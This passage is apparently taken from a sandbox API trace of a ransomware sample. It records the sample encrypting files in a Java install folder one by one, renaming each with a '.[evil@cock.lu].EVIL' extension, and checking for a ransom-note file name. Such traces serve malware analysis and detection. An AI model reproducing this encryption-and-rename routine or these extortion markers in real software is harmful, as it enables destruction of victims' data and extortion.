_Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe") returned 52 [0093.765] wcscmp (_String1="ssvagent.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.765] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ssvagent.exe") returned 0x0 [0093.765] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe") returned 0x34 [0093.765] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ssvagent.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.768] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x11040, lpOverlapped=0x0) returned 1 [0093.772] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.772] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.772] _errno () returned 0x84b1160840 [0093.773] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.773] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x11060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x11060, lpOverlapped=0x0) returned 1 [0093.773] CloseHandle (hObject=0x1a4) returned 1 [0093.773] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.773] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.773] __uncaught_exception () returned 0x84b1160800 [0093.773] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.774] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ssvagent.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ssvagent.exe.[evil@cock.lu].evil")) returned 1 [0093.774] ??_V@YAXPEAX@Z () returned 0x1 [0093.778] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe", dwFileAttributes=0x0) returned 0 [0093.778] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.778] wcsstr (_Str="sunec.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.778] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunec.dll") returned 49 [0093.778] wcscmp (_String1="sunec.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.778] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sunec.dll") returned 0x0 [0093.778] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunec.dll") returned 0x31 [0093.778] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\sunec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.781] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x21040, lpOverlapped=0x0) returned 1 [0093.790] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.790] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.790] _errno () returned 0x84b1160840 [0093.790] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.791] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x21060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x21060, lpOverlapped=0x0) returned 1 [0093.791] CloseHandle (hObject=0x1a4) returned 1 [0093.791] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunec.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.791] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.791] __uncaught_exception () returned 0x84b1160800 [0093.791] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.792] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\sunec.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunec.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\sunec.dll.[evil@cock.lu].evil")) returned 1 [0093.792] ??_V@YAXPEAX@Z () returned 0x1 [0093.795] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunec.dll", dwFileAttributes=0x0) returned 0 [0093.795] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.795] wcsstr (_Str="sunmscapi.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.795] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunmscapi.dll") returned 53 [0093.795] wcscmp (_String1="sunmscapi.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.795] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sunmscapi.dll") returned 0x0 [0093.795] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunmscapi.dll") returned 0x35 [0093.795] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\sunmscapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.797] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x7c40, lpOverlapped=0x0) returned 1 [0093.811] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.811] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.812] _errno () returned 0x84b1160840 [0093.812] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.812] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x7c60, lpOverlapped=0x0) returned 1 [0093.812] CloseHandle (hObject=0x1a4) returned 1 [0093.812] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunmscapi.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.812] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.813] __uncaught_exception () returned 0x84b1160800 [0093.813] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.813] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\sunmscapi.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunmscapi.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\sunmscapi.dll.[evil@cock.lu].evil")) returned 1 [0093.814] ??_V@YAXPEAX@Z () returned 0x1 [0093.817] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\sunmscapi.dll", dwFileAttributes=0x0) returned 0 [0093.818] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.818] wcsstr (_Str="t2k.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.818] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\t2k.dll") returned 47 [0093.818] wcscmp (_String1="t2k.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.818] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="t2k.dll") returned 0x0 [0093.818] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\t2k.dll") returned 0x2f [0093.818] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.820] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3e440, lpOverlapped=0x0) returned 1 [0093.850] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.850] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.850] _errno () returned 0x84b1160840 [0093.850] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.850] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3e460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3e460, lpOverlapped=0x0) returned 1 [0093.851] CloseHandle (hObject=0x1a4) returned 1 [0093.851] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\t2k.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.852] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.852] __uncaught_exception () returned 0x84b1160800 [0093.852] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.852] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\t2k.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\t2k.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\t2k.dll.[evil@cock.lu].evil")) returned 1 [0093.853] ??_V@YAXPEAX@Z () returned 0x1 [0093.857] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\t2k.dll", dwFileAttributes=0x0) returned 0 [0093.857] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.857] wcsstr (_Str="tnameserv.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.857] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe") returned 53 [0093.857] wcscmp (_String1="tnameserv.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.857] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tnameserv.exe") returned 0x0 [0093.857] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe") returned 0x35 [0093.857] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\tnameserv.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.860] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0093.863] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.864] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.864] _errno () returned 0x84b1160840 [0093.864] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.864] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0093.864] CloseHandle (hObject=0x1a4) returned 1 [0093.864] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.864] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.865] __uncaught_exception () returned 0x84b1160800 [0093.865] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.865] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\tnameserv.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\tnameserv.exe.[evil@cock.lu].evil")) returned 1 [0093.866] ??_V@YAXPEAX@Z () returned 0x1 [0093.869] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe", dwFileAttributes=0x0) returned 0 [0093.870] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.870] wcsstr (_Str="unpack.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.870] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack.dll") returned 50 [0093.870] wcscmp (_String1="unpack.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.870] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="unpack.dll") returned 0x0 [0093.870] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack.dll") returned 0x32 [0093.870] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\unpack.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.872] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x13840, lpOverlapped=0x0) returned 1 [0093.897] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.897] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.897] _errno () returned 0x84b1160840 [0093.897] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.897] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x13860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x13860, lpOverlapped=0x0) returned 1 [0093.897] CloseHandle (hObject=0x1a4) returned 1 [0093.897] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.898] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.898] __uncaught_exception () returned 0x84b1160800 [0093.898] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.898] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\unpack.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\unpack.dll.[evil@cock.lu].evil")) returned 1 [0093.899] ??_V@YAXPEAX@Z () returned 0x1 [0093.902] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack.dll", dwFileAttributes=0x0) returned 0 [0093.903] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.903] wcsstr (_Str="unpack200.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.903] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe") returned 53 [0093.903] wcscmp (_String1="unpack200.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.903] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="unpack200.exe") returned 0x0 [0093.903] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe") returned 0x35 [0093.903] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\unpack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.905] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x30240, lpOverlapped=0x0) returned 1 [0093.910] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.910] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.910] _errno () returned 0x84b1160840 [0093.910] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.911] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x30260, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x30260, lpOverlapped=0x0) returned 1 [0093.911] CloseHandle (hObject=0x1a4) returned 1 [0093.911] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.911] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.912] __uncaught_exception () returned 0x84b1160800 [0093.912] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.912] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\unpack200.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\unpack200.exe.[evil@cock.lu].evil")) returned 1 [0093.912] ??_V@YAXPEAX@Z () returned 0x1 [0093.916] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe", dwFileAttributes=0x0) returned 0 [0093.916] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.916] wcsstr (_Str="verify.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.916] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\verify.dll") returned 50 [0093.916] wcscmp (_String1="verify.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.917] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="verify.dll") returned 0x0 [0093.917] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\verify.dll") returned 0x32 [0093.917] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\verify.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.919] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xc040, lpOverlapped=0x0) returned 1 [0093.922] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.922] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.922] _errno () returned 0x84b1160840 [0093.923] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.923] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xc060, lpOverlapped=0x0) returned 1 [0093.923] CloseHandle (hObject=0x1a4) returned 1 [0093.923] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\verify.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.923] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.923] __uncaught_exception () returned 0x84b1160800 [0093.923] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.924] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\verify.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\verify.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\verify.dll.[evil@cock.lu].evil")) returned 1 [0093.924] ??_V@YAXPEAX@Z () returned 0x1 [0093.928] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\verify.dll", dwFileAttributes=0x0) returned 0 [0093.928] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.928] wcsstr (_Str="w2k_lsa_auth.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.928] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll") returned 56 [0093.928] wcscmp (_String1="w2k_lsa_auth.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.928] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="w2k_lsa_auth.dll") returned 0x0 [0093.928] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll") returned 0x38 [0093.928] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.931] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x5e40, lpOverlapped=0x0) returned 1 [0093.934] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.934] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.935] _errno () returned 0x84b1160840 [0093.935] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.935] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x5e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x5e60, lpOverlapped=0x0) returned 1 [0093.935] CloseHandle (hObject=0x1a4) returned 1 [0093.935] 